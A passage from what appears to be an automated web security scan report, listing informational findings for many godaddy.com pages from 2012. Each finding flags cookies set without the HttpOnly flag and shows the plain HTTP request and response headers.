<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.24. http://www.godaddy.com/NewsCenter/marketing-opportunities.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /NewsCenter/marketing-opportunities.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /NewsCenter/marketing-opportunities.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=axt1cxnzdypurvqrarueieex; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=axt1cxnzdypurvqrarueieex; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:22 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:22 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:22 GMT; path=/
Set-Cookie: SplitValue1=23; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:42:22 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/NewsCenter/marketing-opportunities.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=23; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:42:21 GMT
Connection: close
Content-Length: 88744


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.25. http://www.godaddy.com/NewsCenter/releases.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /NewsCenter/releases.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /NewsCenter/releases.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=eoe5a1c4g34srrwmnq3gbqy0; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=eoe5a1c4g34srrwmnq3gbqy0; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:19 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:19 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:19 GMT; path=/
Set-Cookie: SplitValue1=67; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:42:19 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/NewsCenter/releases.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=67; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:42:18 GMT
Connection: close
Content-Length: 135364


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.26. http://www.godaddy.com/NewsCenter/testimonials.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /NewsCenter/testimonials.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /NewsCenter/testimonials.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=vzazjvk2gwsx32uoj0h5adhi; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=vzazjvk2gwsx32uoj0h5adhi; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:24 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:24 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:24 GMT; path=/
Set-Cookie: SplitValue1=26; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:42:24 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/NewsCenter/testimonials.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=26; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:42:24 GMT
Connection: close
Content-Length: 89490


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.27. http://www.godaddy.com/Payment/payment-options.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /Payment/payment-options.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Payment/payment-options.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=r41napfqnh45r24axwbq2fqg; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=r41napfqnh45r24axwbq2fqg; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:50 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:50 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:50 GMT; path=/
Set-Cookie: SplitValue1=69; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:42:50 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Payment/payment-options.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=69; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:42:50 GMT
Connection: close
Content-Length: 104110


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.28. http://www.godaddy.com/SocialMedia/social-media.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /SocialMedia/social-media.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /SocialMedia/social-media.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=r5m5fjxayzwsqbitmkaqufdz; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=r5m5fjxayzwsqbitmkaqufdz; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:01 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:01 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:42:01 GMT; path=/
Set-Cookie: SplitValue1=87; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:42:01 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/SocialMedia/social-media.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=87; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:42:01 GMT
Connection: close
Content-Length: 88781


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.29. http://www.godaddy.com/affiliates/affiliate-program.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /affiliates/affiliate-program.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /affiliates/affiliate-program.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=imsigbtgdd4c2eer5xc4vowu; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=imsigbtgdd4c2eer5xc4vowu; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:52 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:52 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:52 GMT; path=/
Set-Cookie: SplitValue1=47; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:52 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/affiliates/affiliate-program.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=47; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:51 GMT
Connection: close
Content-Length: 129988


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...

4.30. http://www.godaddy.com/agreements/ShowDoc.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /agreements/ShowDoc.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /agreements/ShowDoc.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=2jif10tlij52wbertbbnfkka; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=2jif10tlij52wbertbbnfkka; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: SplitValue1=34; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:35 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/agreements/ShowDoc.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=34; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:35 GMT
Connection: close
Content-Length: 8654


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...

4.31. http://www.godaddy.com/appraisal/domain-appraisal.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /appraisal/domain-appraisal.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /appraisal/domain-appraisal.aspx HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ws5jw4vh5tuzq2dphfi4us5a; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; SplitValue1=75; flag1=cflag=us; currencypopin1=cdisplaypopin=false; GoogleADServicesgoogleadwordshome=zbnczeofsfcgdhzeqcxgcadeafyilatc; pathway=221039fb-1ef3-4a9c-9888-ebefb84fcda3; HPBackground=Danica2; MemPDC1=ljrecdtffbugaahgraqdyjybtizayfne; MemPDCLoc1=net; PCSplitValue1=1; GoogleADServicesgoogleadwordssearch=hbjjxbcaiaffadneicfbdagjqgiiggnd; BlueLithium_domainsearch=keydqgeemhudugljzexamaxfhjofnevf; BlueLithium=ldubxiuhpfmhtbbiyjmelhwaahghdbma; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=10; actioncount=; app_pathway=; visitor=vid=221039fb-1ef3-4a9c-9888-ebefb84fcda3; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=http://www.godaddy.com/hosting/website-builder.aspx&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:54:56 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/appraisal/domain-appraisal.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:54:55 GMT
Content-Length: 89534


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.32. http://www.godaddy.com/auctions/domain-auctions.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /auctions/domain-auctions.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /auctions/domain-auctions.aspx?ci=4387&app_hdr=0 HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=bj4af414yw11y3zt5lveqef3; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=bj4af414yw11y3zt5lveqef3; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:40 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:40 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:40 GMT; path=/
Set-Cookie: SplitValue1=14; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:40 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/auctions/domain-auctions.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=ci=4387&app_hdr=0&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=14; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:39 GMT
Connection: close
Content-Length: 103852


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.33. http://www.godaddy.com/auctions/popups/buy-sell-explanation.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /auctions/popups/buy-sell-explanation.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /auctions/popups/buy-sell-explanation.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=pq0xbv0ijf1otpbrw5qag5r1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=pq0xbv0ijf1otpbrw5qag5r1; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: SplitValue1=28; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:45 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/auctions/popups/buy-sell-explanation.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=28; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:44 GMT
Connection: close
Content-Length: 6847


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.34. http://www.godaddy.com/auctions/popups/escrow.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /auctions/popups/escrow.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /auctions/popups/escrow.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=he5hlr2nonc3vviodjvsfuwb; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=he5hlr2nonc3vviodjvsfuwb; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: SplitValue1=54; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:46 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/auctions/popups/escrow.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=54; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:46 GMT
Connection: close
Content-Length: 2782


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.35. http://www.godaddy.com/business/mobile-app.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /business/mobile-app.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /business/mobile-app.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=p4nsncifetrmahat41jiyo1p; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=p4nsncifetrmahat41jiyo1p; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:18 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:18 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:18 GMT; path=/
Set-Cookie: SplitValue1=41; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:18 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/business/mobile-app.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=41; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:17 GMT
Connection: close
Content-Length: 104675


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.36. http://www.godaddy.com/catalog.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /catalog.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /catalog.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=fri1wue3vd1ic4jrkxaauj3c; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=fri1wue3vd1ic4jrkxaauj3c; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:56 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:56 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:56 GMT; path=/
Set-Cookie: SplitValue1=67; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:56 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/catalog.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=67; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:56 GMT
Connection: close
Content-Length: 103706


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.37. http://www.godaddy.com/charity/roundupforcharity.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /charity/roundupforcharity.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /charity/roundupforcharity.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
